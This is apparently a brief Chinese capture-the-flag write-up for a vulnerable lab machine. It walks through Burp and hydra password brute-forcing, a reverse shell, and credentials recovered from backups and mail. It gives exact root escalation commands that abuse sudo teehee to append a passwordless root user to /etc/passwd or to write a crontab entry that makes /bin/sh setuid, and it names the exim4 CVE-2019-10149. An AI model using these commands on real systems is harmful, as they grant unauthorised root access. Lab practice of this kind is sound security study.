burp爆破得到登录口令
admin happy
执行命令时抓包，反弹shell，/home/jim/backups可以得到历史口令，hydra爆破得到jim口令jibril04
登录后输入mail，发现charles的口令^xHhA&hvim0y，再登录charless
sudo -l发现teehee可以提权，向/etc/passwd追加空口令用户，成功提权root
echo "root3::0:0:root:/root:/bin/bash" | sudo teehee -a /etc/passwd
su root3
也可以写/etc/crontab，一分钟后提权
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab 
/bin/sh
另外也可以用exim4的CVE-2019-10149提权